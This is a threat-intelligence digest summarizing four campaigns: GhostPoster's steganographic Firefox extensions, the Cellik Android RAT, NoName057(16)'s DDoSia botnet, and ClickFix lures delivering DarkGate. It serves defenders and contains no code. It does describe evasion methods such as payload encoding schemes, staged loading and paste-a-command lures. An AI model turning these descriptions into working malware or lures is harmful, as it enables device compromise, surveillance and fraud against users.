GhostPoster: Steganography-Enabled Malicious Firefox Extension
Intelligence from Koi Security shows that the GhostPoster campaign is abusing Firefox extensions to gain high-privilege, persistent access to users’ browsers while remaining difficult to detect. The operation centers on extensions such as “Free VPN Forever” that appear benign but conceal a steganographic JavaScript loader within their own PNG logo, which is activated by scanning for a “===” marker in the image bytes. Once executed, this loader periodically contacts attacker-controlled infrastructure, retrieves an encoded payload, and uses a custom scheme—case swapping, digit swapping, Base64, and XOR with the extension ID—to store decrypted code in browser storage without leaving obvious static artifacts. The final payload focuses on monetization and surveillance: hijacking affiliate links on major e-commerce platforms, injecting Google Analytics tracking into every page, and building detailed profiles of infected browsers. In parallel, the extensions strip security headers, inject hidden iframes, and implement multiple CAPTCHA-bypass techniques to keep their ad and click-fraud pipeline running while degrading baseline web security. From an operational standpoint, GhostPoster emphasizes layered evasion rather than novel exploitation, combining steganography, staged loading, randomized C2 check-ins, delayed activation, and encrypted on-disk artifacts to frustrate both automated review and traditional network monitoring. Some of the 17 related extensions use PNG-embedded payloads, while others fetch or eval obfuscated JavaScript from the same backend domains, suggesting an experimentation phase to identify which delivery methods best evade detection while maximizing installs and revenue. The campaign fits a broader pattern in which “free VPN” and utility extensions are repurposed as surveillance and monetization platforms, exploiting user trust in security- and privacy-branded software. For defenders, GhostPoster underscores the need to treat browser extensions as high-risk code, to prioritize behavioral monitoring over static analysis, and to hunt for indicators such as anomalous image parsing, header stripping across all sites, hidden iframe lifecycles, and low-frequency, probabilistic C2 traffic originating from extension processes.
Cellik: Play-Store–Integrated Android RAT as an Operational Enabler
Cellik is a newly observed Android remote access trojan (RAT) that prioritizes operational breadth and ease of deployment over novel exploitation techniques, offering full device control, real-time surveillance, and tightly integrated Play Store–based distribution. It provides operators with live screen streaming and remote UI control, effectively turning the victim’s phone into an invisible VNC session, while also enabling continuous keylogging and full notification interception to harvest messages and one-time passcodes. The RAT extends this visibility with comprehensive file system access, including browsing, exfiltration, modification, and deletion of local and cloud-linked files, with encrypted transfers to reduce detection by network and on-device security layers. Beyond passive surveillance, Cellik enables active abuse via a hidden browser that can drive invisible web sessions, replay saved cookies, and intercept submitted credentials, allowing attackers to perform stealthy phishing and account takeover directly from the victim device. An integrated injection framework supports malicious overlays and in-app code injection, enabling targeted credential theft and data interception across multiple apps in parallel. In effect, Cellik consolidates common Android espionage and fraud capabilities into a single pane of glass, enabling continuous, interactive control of compromised devices. Cellik’s most concerning advancement is its integration with the Google Play ecosystem and an embedded one-click APK builder that lets operators wrap its payload inside legitimate Play Store apps. Through its control panel, an attacker can browse trusted applications, bundle the RAT into popular packages, and generate repackaged APKs aimed at stealthy, large-scale distribution that may evade reputation-based defenses. This model mirrors and extends trends seen in other Android malware-as-a-service offerings such as HyperRAT, PhantomOS, and Nebula, where subscription-based kits provide turnkey APK generation, cloud C2, and user-friendly dashboards to low-skilled actors. For defenders, Cellik underscores the need for stronger mobile telemetry, behavioral detection focused on remote control and hidden browsing activity, scrutiny of repackaged apps that masquerade as popular titles, and continuous monitoring of underground markets where such kits are marketed and iterated.
NoName057(16)’s Volunteer Botnet Targeting European Government and Infrastructure
Intelligence from Picus Security shows that NoName057(16) is systematically targeting NATO members and European states that oppose Russia’s invasion of Ukraine, with a strong emphasis on government and critical service providers. The group, assessed as a Kremlin-backed hacktivist project originally incubated within CISM, coordinates largely via Telegram and uses its proprietary DDoSia platform to transform volunteers into a managed, reward-based botnet. DDoSia employs a two-stage kill chain: clients first authenticate by sending AES-GCM–encrypted system fingerprints, then retrieve encrypted target lists that define victim hosts, ports, protocols (such as HTTP/2), and randomized parameters to evade simple filters. The underlying infrastructure is multi-tiered, with short-lived public-facing C2 nodes fronting more restricted backend servers, enabling rapid rotation of exposed assets while preserving the core command environment. From a tradecraft standpoint, DDoSia supports a blend of volumetric and application-layer techniques—including SYN and ACK floods, HTTP GET floods, and Slow Loris–style “nginx_loris” attacks—primarily over ports 80 and 443 to blend with legitimate web traffic. This model lowers the barrier to participation by providing an easy-to-use Go-based client and cryptocurrency incentives, while central operators retain control over targeting and attack profiles. NoName057(16) has further expanded its impact through collaborations with other pro-Russia hacktivist entities, such as the Cyber Army of Russia Reborn, contributing to the creation of the hybrid Z‑Pentest group and claiming operations targeting operational technology assets. Despite coordinated law-enforcement activity in July 2025 under Operation Eastwood—including arrests, warrants, and searches across several European countries—the actor remains active and continues to frame its campaigns as patriotic cyber-partisan operations in support of Russian strategic objectives. For defenders, this activity underscores the need for layered DDoS protections, monitoring of characteristic traffic patterns and timing, and tabletop exercises focused on state-aligned hacktivist campaigns leveraging crowdsourced tooling.
ClickFix Campaigns Exploit “Fix-It” Prompts to Deploy DarkGate
ClickFix is a socially engineered initial access technique that relies on user-driven execution of attacker-supplied commands rather than autonomous exploitation, blending deceptive troubleshooting prompts with layered obfuscation to deliver DarkGate malware. The flow typically begins with a fake browser or extension error—such as a “Word Online extension not installed” warning—paired with a “How to fix” button that conceals multiple layers of Base64-encoded content within the HTML. When decoded, these strings reveal a PowerShell command that silently downloads a malicious HTA file from a remote server, saves it to a public directory, and executes it, while clearing the clipboard and exiting to reduce forensic artifacts. Subsequent stages deploy an AutoIt executable and embedded script, which create additional directories, drop more components, and execute them without further user interaction, using DES-encrypted logic to unpack and launch DarkGate. Once active, DarkGate establishes C2 communications and enables full remote access, matching MITRE ATT&CK patterns for command-and-scripting-interpreter abuse, obfuscation, masquerading, and web-based C2. ClickFix underscores how adversaries weaponize user trust in “helpful” fixes by offloading critical execution steps—copying from the clipboard, running “Win + R”, and pasting commands—onto victims, thereby sidestepping some traditional detection controls. The technique’s reliance on HTML-embedded, reversibly encoded PowerShell, masqueraded HTA payloads, and staged AutoIt loaders makes it difficult to spot without behavioral monitoring focused on script interpreters, clipboard manipulation, and unexpected process chains. Recommended mitigations include user education against running copied commands, restricting access to Win + R and unapproved interpreters in enterprise environments, enforcing application control for HTA/PowerShell execution, and deploying security tools that detect anomalous script behavior rather than just signatures.
